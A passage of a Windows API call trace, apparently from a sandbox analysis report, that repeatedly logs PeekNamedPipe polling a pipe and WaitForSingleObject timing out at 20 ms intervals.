dwMilliseconds=0x14) returned 0x102 [0101.020] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0101.020] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0101.051] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0101.051] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0101.082] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0101.082] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0101.114] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0101.115] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0101.144] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0101.145] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0101.176] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0101.176] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0101.207] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0101.207] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0101.238] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0101.238] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0101.274] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0101.274] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0101.300] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0101.300] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0101.332] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0101.332] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0101.363] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0101.363] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0101.394] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0101.401] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0101.641] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0101.641] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0101.878] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0101.878] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0101.909] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0101.909] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0101.940] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0101.940] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0101.972] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0101.973] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0102.017] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0102.017] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0102.615] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0102.615] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0102.939] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0102.939] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0103.545] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0103.545] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0103.566] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0103.566] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0104.154] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0104.154] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0104.534] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0104.534] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0105.037] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0105.037] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0105.088] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0105.089] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0105.118] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0105.118] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0105.155] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0105.155] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0105.696] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0105.741] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0105.989] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0105.990] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0106.012] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0106.012] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0106.043] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0106.043] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0106.074] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0106.074] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0106.105] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0106.105] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0106.137] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0106.137] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0106.168] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0106.168] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0106.199] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0106.199] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0106.230] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0106.230] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0106.262] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0106.262] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0106.292] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0106.293] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0106.647] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0106.652] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0106.699] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0106.699] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0107.222] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.256] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0107.479] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.479] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0107.509] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.509] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0107.540] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.540] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0107.573] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.573] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0107.603] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.603] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0107.634] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.635] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0107.665] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.665] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0107.696] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.697] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0107.738] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.738] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0107.759] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.759] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0107.790] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.790] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0107.823] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.823] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0107.852] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.853] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0107.884] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.884] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0107.915] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.915] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0107.999] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0107.999] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0108.440] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0108.441] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0108.463] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0108.463] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0108.493] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0108.493] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0109.035] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0109.036] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0109.125] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0109.130] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0109.562] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0109.562] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0109.585] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0109.585] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0109.624] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0109.624] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0110.834] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, 